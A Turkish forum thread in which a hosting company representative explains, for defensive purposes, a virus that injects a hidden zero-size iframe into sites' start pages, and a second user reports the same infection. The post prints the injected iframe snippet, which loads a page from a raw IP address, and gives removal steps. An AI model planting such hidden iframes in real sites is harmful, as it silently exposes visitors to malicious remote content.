Sevgili Arkadaslar sanırım bu virus hakkında ayrıntılı bilginiz yok ben açıklayayım burada ve diğer arkadaslarda onlemlerini alsınlar biz turkiyede buyuk bir host firmasıyız bu virusle daha once karsılasmıstık. İlk önce virus kendını index.asp default.asp main.asp index.html vs turu ilk okuyucu türlere gizli bir i f r a m e olarak atmaktadır. örnek : <i f r a m e src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> şu anda gunceli bu bunun bulastıgı yer ise arkadasların dedigi gibi cmod vs zannedilsin diye kurnazca yapılmış host yetkililerini uyarınız bu virus web wiz forumun kendi forumlarınının linkleri kaldırıldıgında savunma amacı ile uretilmiş illegal bir virusdur. kurulan web wiz forum altında bulun bis .js dosyası aracılıgı ile tüm hosttaki yada bulundugu hosttaki ilk okucu türlere bulaşmaktadır Sevgili arkadaşımız. bunu kaldırmanın yolu diger hhosttaki dosyalarınızı tekrar atmanıza gerek yok hosttaki baslangıc tür dosyanız ne ise örnek default.asp sadece ona bulasmıstır onu indirerek içindeki i f r a m e li bölümü siliniz. sonra kaydedip tekrar gonderiniz bir iki gun surekli takip ediniz. i f r a m e aynı yere kendını tekrar kaydederse anlayınki host makinasında hala virus barınıyor. Herkeze Kolay Gelsin Teşekkürler.
bu sorunu yaşıyorum. bu kod tüm index.html ve index.php dosyalarına bulaşmış bir şekilde araştırdıgımda bir arkadaşın yazmış olduğu sonuç olarak bunu gördüm. bu konuda bilgisi olan arkadaşlarımız varsa yazabilirlermi?